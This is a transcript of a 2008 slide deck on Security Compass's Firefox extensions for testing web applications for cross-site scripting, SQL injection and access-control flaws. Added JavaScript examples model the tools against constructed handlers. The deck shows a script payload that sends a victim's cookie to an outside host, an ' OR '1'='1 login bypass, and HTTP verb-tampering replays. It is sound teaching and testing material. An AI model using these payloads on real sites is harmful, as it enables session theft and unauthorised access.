Firefox Plug-ins for Application Penetration Testing: Exploit-Me
© 2008 Security Compass inc.

Uploaded by eliza-divine on 01-Apr-2015


TRANSCRIPT

Page 1: Firefox Plug-ins for Application Penetration Testing: Exploit-Me

Page 2: Who are we?

• Tom Aratyn: Software Developer at Security Compass; developed the Exploit-Me tools

Page 3: Who are we?

• Jamie: Security Consultant for Security Compass; background in security research, penetration testing, and software development

Page 4: Agenda

• Cross-site scripting: really a danger?
• State of web application security
• XSS-Me
• SQL Inject-Me
• Access Me

Page 5: XSS: Really a Danger?

• We know XSS can be dangerous, but can we use it to rob a bank?
  – AJAX + CSRF + XSS = major problem

Page 6: Two Exciting Flavours

• Reflected: spat straight back in the response to the request that carried it; XSS-Me helps here
• Stored: saved by the application and served to someone else later; planned for a future XSS-Me version

Page 7: What is this XSS Stuff

• Unvalidated user input executed in the user's browser
• JavaScript is typically used; PDF files are XSS-able too
• Someone took my cookie:

<SCRIPT>location.href="http://10.1.1.1/cgi-bin/steal.cgi?"+escape(document.cookie);</SCRIPT>

Page 8: Someone Changed my App

• AJAX adds a new element to these attacks; AJAX was used in the IBDBank attack
• The attacker can play with the application's data as if the victim were doing it: send, receive, parse

Page 9: State of Web App Insecurity

• Web app exploits outnumber buffer overflows in CVE
• A large portion of web apps suffer from XSS or SQL injection

Page 10: Testing Tools

• Various tools exist: OWASP tools, commercial, open source
• They work very well, for what they were built to do

Page 11: The Missing Piece

• Most tools are not built for developers or QA
• Developers and QA must be checking for security vulnerabilities
• They need lightweight tools

Page 12: XSS-Me 0.4 to the Rescue

• Firefox extension to test for cross-site scripting

Page 13: XSS-Me Features

• Pick forms & fields to test
• Firefox 3
• Import/export/add/remove XSS strings
• Test & Surf
• Heuristics to limit tests

Page 14: Heuristics?

• Checking all attacks against all fields is slow. (No, trust me, it's slow.)
• Heuristic tests limit the fields we have to check by first determining whether they can be injected at all: a set of characters (;\/<>='") is submitted and the response is checked for which of them come back unchanged. Only fields that reflect them get the full attack set.

Page 15: Behind the Magic

• Each attack string attempts to set document.vulnerable=true in the DOM of the response page
• If the property is set, the attack worked
• Also checks whether the attack string appears as plain text in the page; reported as a potential vulnerability (e.g. OnMouseOver injection)
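The reflection heuristic from "Heuristics?" and the vulnerable/potential verdicts from "Behind the Magic", modelled offline as an added example (this is not XSS-Me's own code). The four server handlers are constructed stand-ins; the rule that only fields reflecting one of < " ' get the full attack set is an assumption, since the deck does not say which characters XSS-Me requires. The extension decides by loading the response in Firefox and reading document.vulnerable; here, where no DOM is available, "vulnerable" means the payload landed in the markup unencoded and "potential" means it is only visible as text.

```javascript
// Added example, not XSS-Me's own code: offline model of the extension's
// two-stage approach.
//  1. Heuristic pre-check: submit each character the slides list
//     (;\/<>='") and record which come back unencoded.
//  2. Only fields that reflect a tag- or attribute-breaking character
//     (< " ') get the full attack strings (assumption).
//  3. Classify: "vulnerable" if the payload became live markup,
//     "potential" if it is only echoed as visible text, "clean" otherwise.

const PROBE_CHARS = [';', '\\', '/', '<', '>', '=', "'", '"'];

// Two attack strings in the style of the slides: one runs as a script,
// the other breaks out of a double-quoted attribute.
const ATTACK_STRINGS = [
  '<script>document.vulnerable=true;</script>',
  '" onmouseover="document.vulnerable=true" x="',
];

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function htmlEscape(s) { return s.replace(/[&<>"']/g, c => ESCAPES[c]); }

// Visible text of a response: strip tags, then decode the entities above.
function textContent(html) {
  return html.replace(/<[^>]*>/g, '')
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'").replace(/&amp;/g, '&');
}

// Heuristic: which probe characters does this field reflect unencoded?
// `submit(value)` stands in for posting the form and returning the HTML.
function reflectedChars(submit) {
  return PROBE_CHARS.filter(c => submit(`xssme${c}xssme`).includes(`xssme${c}xssme`));
}

function classify(submit, attack) {
  const body = submit(attack);
  if (textContent(body).includes(attack)) return 'potential'; // visible as text only
  if (body.includes(attack)) return 'vulnerable';             // became live markup
  return 'clean';
}

function testField(submit) {
  const reflected = reflectedChars(submit);
  const injectable = reflected.some(c => '<"\''.includes(c));
  if (!injectable) return { reflected, skipped: true, results: {} };
  const results = {};
  for (const a of ATTACK_STRINGS) results[a] = classify(submit, a);
  return { reflected, skipped: false, results };
}

// Constructed stand-ins for four server-side handlers of a search field.
const targets = {
  rawBody:      v => `<p>Results for ${v}</p>`,
  encodedBody:  v => `<p>Results for ${htmlEscape(v)}</p>`,
  bracketsOnly: v => `<p>Results for ${v.replace(/</g, '&lt;').replace(/>/g, '&gt;')}</p>`,
  strippedAttr: v => `<input name="q" value="${v.replace(/[<>]/g, '')}">`,
};

for (const [name, submit] of Object.entries(targets)) {
  console.log(name, JSON.stringify(testField(submit)));
}
```

The heuristic skips encodedBody outright (only ;\/= survive), strippedAttr reflects quotes but not angle brackets, so the script payload is clean there while the attribute breakout is live, and bracketsOnly shows the "potential" case: the script is encoded, so it is visible text rather than markup.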

Page 16: Thank $deity for Struts

• Everyone says "use Struts to protect yourself". Sure, just don't follow the supplied examples.

Page 17: Being Bobby

Classic ASP, building the query by string concatenation:

sql = "SELECT * FROM users WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"

User input:
username = jimmy
password = blah' OR '1'='1

Resulting query:

SELECT * FROM users WHERE username = 'jimmy' AND password = 'blah' OR '1'='1'

AND binds tighter than OR, so the WHERE clause reads (username = 'jimmy' AND password = 'blah') OR '1'='1'. The second branch is true for every record, so the entire table is returned!

Courtesy XKCD.com

Page 18: No Excuse

• The defence is well known and faster than what you're doing now: prepared statements, stored procedures
• Ok, a stored procedure that builds dynamic SQL from its arguments and runs it with EXEC is also vulnerable, but you're not doing that, right?

Page 19: SQL Inject-Me 0.4

• Firefox extension to check for SQL injection

Page 20: SQL Inject-Me Features

• Pick what you test
• Configure attack and success strings
• Large default string set
• Firefox 3
• Test & Surf
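The attack-string / success-string loop from "SQL Inject-Me Features", run against the concatenated query from "Being Bobby" and its prepared-statement replacement from "No Excuse". This is an added example, not SQL Inject-Me's code: the two login handlers and the toy database are constructed, and the toy models only one thing, a parser rejecting an unterminated string literal with a MySQL-style message. The success patterns are real error-message shapes; the list is deliberately short.

```javascript
// Added example, not SQL Inject-Me's own code.

// Attack strings: what gets submitted into each field.
const SQLI_ATTACKS = ["'", '"', "1'1", "' OR '1'='1"];

// Success strings: responses matching one of these mean the payload reached
// the database parser. Real message shapes; a production list is far longer.
const SUCCESS_PATTERNS = [
  /You have an error in your SQL syntax/i,   // MySQL
  /Unclosed quotation mark/i,                // Microsoft SQL Server
  /ORA-\d{5}/,                               // Oracle
];

// Toy database (constructed): an odd number of single quotes means an
// unterminated literal, which a real parser would reject.
function runQuery(sql, params) {
  const quotes = (sql.match(/'/g) || []).length;
  if (quotes % 2 !== 0) {
    return `<h1>Error</h1><pre>You have an error in your SQL syntax; check the manual near ${sql.slice(-20)}</pre>`;
  }
  return '<h1>Login failed</h1>';
}

function makeLoginHandler({ parameterized }) {
  return (username, password) => {
    if (parameterized) {
      // Statement text is fixed; values are bound separately and are never
      // parsed as SQL, whatever characters they contain.
      return runQuery('SELECT * FROM users WHERE username = ? AND password = ?', [username, password]);
    }
    // The "Being Bobby" pattern: user input becomes part of the statement.
    const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;
    return runQuery(sql, []);
  };
}

// The extension's loop: for each field, submit each attack string and keep
// the ones whose response matched a success pattern.
function testLoginForm(handler) {
  const findings = {};
  for (const field of ['username', 'password']) {
    findings[field] = [];
    for (const attack of SQLI_ATTACKS) {
      const args = field === 'username' ? [attack, 'secret'] : ['jimmy', attack];
      const body = handler(...args);
      if (SUCCESS_PATTERNS.some(p => p.test(body))) findings[field].push(attack);
    }
  }
  return findings;
}

console.log('concatenated:', testLoginForm(makeLoginHandler({ parameterized: false })));
console.log('prepared:    ', testLoginForm(makeLoginHandler({ parameterized: true })));
```

Note which payload does not show up: the slide's own ' OR '1'='1 keeps the quotes balanced, so it never produces an error page even though it changes the query's logic. Error-string matching finds the injection point through the lone quote; confirming what a balanced payload does still needs a comparison against a benign baseline response.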

Page 21: What's your method

• Web/application servers may be vulnerable to HTTP verb tampering attacks
• Bypasses common authorization configurations: a rule that lists the methods it covers (say GET and POST) is never consulted for a request using any other method

Page 22: Access Me 0.2

• Firefox extension to check for authentication and access-control issues

Page 23: Access Me Features

• Checks for unauthenticated access vulnerabilities
• Checks for HTTP verb vulnerabilities
• Regular-expression-based parameter detection
• Automatic test as you surf

Page 24: Detecting Access Vulnerabilities

• Failed: the replayed request gets status 200 and a response too similar to the original
• Warning: status 200 or a response too similar, but not both
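The verdict rule from "Detecting Access Vulnerabilities", applied to the two replays "Access Me Features" lists (the same request without its session and with a different verb) against the kind of method-keyed authorization rule "What's your method" describes. This is an added example, not Access Me's code. The server is constructed; its choice to serve the page for any verb its rule does not list is the fall-through the attack depends on. The similarity measure (Dice coefficient over character trigrams) and the 0.9 threshold are this example's assumptions; the deck only says "too similar".

```javascript
// Added example, not Access Me's own code.

const ACCOUNT_PAGE = '<html><body><h1>Account</h1><p>Balance: 1,234.56</p></body></html>';
const LOGIN_PAGE = '<html><body><h1>Login</h1><form action="/login"><input name="u"></form></body></html>';

// rules: [{ path, methods }]; methods === null means the rule covers every method.
function makeServer(rules) {
  return (req) => {
    const rule = rules.find(r => r.path === req.path);
    const covered = rule && (rule.methods === null || rule.methods.includes(req.method));
    if (covered && req.cookie !== 'session=valid') return { status: 302, body: LOGIN_PAGE };
    if (req.path === '/account') {
      // HEAD gets no body; any other method falls through to the page
      // (constructed behaviour, the fall-through verb tampering relies on).
      return { status: 200, body: req.method === 'HEAD' ? '' : ACCOUNT_PAGE };
    }
    return { status: 404, body: 'Not found' };
  };
}

function trigrams(s) {
  const set = new Set();
  for (let i = 0; i + 3 <= s.length; i++) set.add(s.slice(i, i + 3));
  return set;
}

// Dice coefficient over trigram sets: 1 for identical bodies, 0 for disjoint.
function similarity(a, b) {
  const ta = trigrams(a), tb = trigrams(b);
  if (ta.size === 0 && tb.size === 0) return 1;
  let common = 0;
  for (const t of ta) if (tb.has(t)) common++;
  return (2 * common) / (ta.size + tb.size);
}

// Slide 24's rule: 200 AND similar = failed; 200 OR similar = warning.
function verdict(original, replay, threshold = 0.9) {
  const ok = replay.status === 200;
  const similar = similarity(original.body, replay.body) >= threshold;
  if (ok && similar) return 'FAILED';
  if (ok || similar) return 'WARNING';
  return 'PASSED';
}

// Replay the request the user just made without its cookie, then with the
// verb changed, and grade each replay against the original response.
function accessMe(server, req) {
  const original = server(req);
  const replays = {
    noCookie:     { ...req, cookie: undefined },
    headNoCookie: { ...req, cookie: undefined, method: 'HEAD' },
    jeffNoCookie: { ...req, cookie: undefined, method: 'JEFF' },  // arbitrary verb
  };
  const report = {};
  for (const [name, r] of Object.entries(replays)) report[name] = verdict(original, server(r));
  return report;
}

const request = { method: 'GET', path: '/account', cookie: 'session=valid' };
const weakRules  = [{ path: '/account', methods: ['GET', 'POST'] }]; // only these verbs are checked
const fixedRules = [{ path: '/account', methods: null }];            // rule covers every verb
console.log('weak: ', accessMe(makeServer(weakRules), request));
console.log('fixed:', accessMe(makeServer(fixedRules), request));
```

With the weak rule the cookie-less GET is redirected (PASSED), HEAD returns 200 with an empty body (WARNING: status matched, content did not), and the unlisted verb returns the full account page (FAILED). Removing the method list from the rule turns all three replays into PASSED.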

Page 25: Where can you get 'em

• Available from our website: www.securitycompass.com
• Extra XSS-Me attack strings also available from the site
• Open sourced under GPL v3

Page 26: The Future...

• May include: spidering, stored attacks

Page 27: Questions

• Let's have 'em: [email protected], [email protected]